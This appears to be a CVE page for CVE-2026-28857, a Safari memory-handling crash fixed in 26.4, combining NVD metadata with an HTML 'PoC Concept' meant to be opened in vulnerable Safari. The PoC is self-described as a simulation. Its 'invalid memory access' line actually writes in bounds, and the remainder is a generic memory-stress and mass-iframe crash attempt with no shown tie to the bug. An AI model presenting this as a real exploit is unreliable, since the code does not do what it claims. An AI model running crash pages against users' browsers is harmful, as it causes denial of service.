CVE-2026-28857

<!-- PoC Concept for CVE-2026-28857 Description: Maliciously crafted web content causing process crash. Usage: Open in a vulnerable version of Safari (< 26.4). --> <!DOCTYPE html> <html> <head> <title>Memory Handling Crash PoC</title> </head> <body> <script> // Attempting to trigger memory corruption try { // Simulate complex object manipulation that might trigger the bug let buffer = new ArrayBuffer(0x100000); let view = new DataView(buffer); // Malicious loop to stress memory handling for (let i = 0; i < 100000; i++) { // Invalid memory access simulation view.setUint8(0x100000 - 1, i); } // Trigger potential crash document.body.innerHTML = "<iframe src='about:blank'></iframe>".repeat(10000); } catch (e) { console.log("PoC Execution failed: " + e.message); } </script> </body> </html>

{"cve": {"id": "CVE-2026-28857", "sourceIdentifier": "[email protected]", "published": "2026-03-25T01:17:09.817", "lastModified": "2026-03-26T18:25:21.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The issue was addressed with improved memory handling. This issue is fixed in Safari 26.4, iOS 26.4 and iPadOS 26.4, macOS Tahoe 26.4, visionOS 26.4. Processing maliciously crafted web content may lead to an unexpected process crash."}, {"lang": "es", "value": "El problema se abordó con una gestión de memoria mejorada. Este problema está solucionado en Safari 26.4, iOS 26.4 y iPadOS 26.4, macOS Tahoe 26.4, visionOS 26.4. El procesamiento de contenido web creado con fines maliciosos puede provocar una caída inesperada del proceso."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-416"}, {"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "993386B4-0570-414F-B4A6-3E65F5704903"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "F813DB63-2B55-4E0B-9073-5465C65F69D6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "01612D13-BE5B-43F8-B53E-5BF57F2A5B0C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.4", "matchCriteriaId": "6CF848CD-25D4-4371-BEF3-1ACCE47AD81F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "113B9705-BFF0-4357-B1AB-F57052F32361"}]}]}], "references": [{"url": "https://support.apple.com/en-us/126792", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126794", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126799", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126800", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}